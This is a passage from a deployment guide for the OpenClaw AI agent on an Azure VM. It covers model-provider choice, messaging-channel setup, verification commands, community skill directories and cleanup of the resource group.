The installer installs Node LTS and dependencies if not already present, installs OpenClaw, and launches the OpenClaw onboarding wizard. For more information, see the open source OpenClaw install docs.

OpenClaw Onboarding: Choosing an AI Model Provider

During OpenClaw onboarding, you'll choose the AI model provider for the OpenClaw agent. This can be GitHub Copilot, Azure OpenAI, OpenAI, Anthropic Claude, Google Gemini, or another supported provider. See the open source OpenClaw install docs for details on choosing an AI model provider when going through the onboarding wizard.

Most enterprise Azure teams already have GitHub Copilot licenses. If that is your case, we recommend choosing the GitHub Copilot provider in the OpenClaw onboarding wizard. See the open source OpenClaw docs on configuring GitHub Copilot as the AI model provider.

OpenClaw Onboarding: Setting up Messaging Channels

During OpenClaw onboarding, there will be an optional step where you can set up various messaging channels to interact with your OpenClaw agent.

For first time users, we recommend setting up Telegram due to ease of setup. Other messaging channels such as Microsoft Teams, Slack, WhatsApp, and others can also be set up.

To configure OpenClaw for messaging through chat channels, see the open source OpenClaw chat channels docs.

Step 3: Verify OpenClaw Configuration

To validate that everything was set up correctly, run the following commands within the same Bastion SSH session:

openclaw status openclaw gateway status

If there are any issues reported, you can run the onboarding wizard again with the steps above. Alternatively, you can run the following command:

openclaw doctor

Message OpenClaw

Once you have configured the OpenClaw agent to be reachable via various messaging channels, you can verify that it is responsive by messaging it.

Enhancing OpenClaw for Use Cases

There you go! You now have a 24/7, always-on personal AI agent, living on its own Azure VM environment.

For awesome OpenClaw use cases, check out the awesome-openclaw-usecases repository.
To enhance your OpenClaw agent with additional AI skills so that it can autonomously perform multi-step operations on any domain, check out the awesome-openclaw-skills repository.
You can also check out ClawHub and ClawSkills, two popular open source skills directories that can enhance your OpenClaw agent.

Cleanup

To delete all resources created by this guide:

az group delete -n "${RG}" --yes --no-wait

This removes the resource group and everything inside it (VM, VNet, NSG, Bastion, public IP). This also deletes the OpenClaw agent running within the VM.

If you'd like to dive deeper about deploying OpenClaw on Azure, please check out the open source OpenClaw on Azure docs.